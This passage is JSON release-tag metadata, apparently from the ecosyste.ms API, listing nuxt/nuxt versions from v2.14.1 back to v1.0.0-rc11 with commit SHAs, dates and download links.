sitories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nux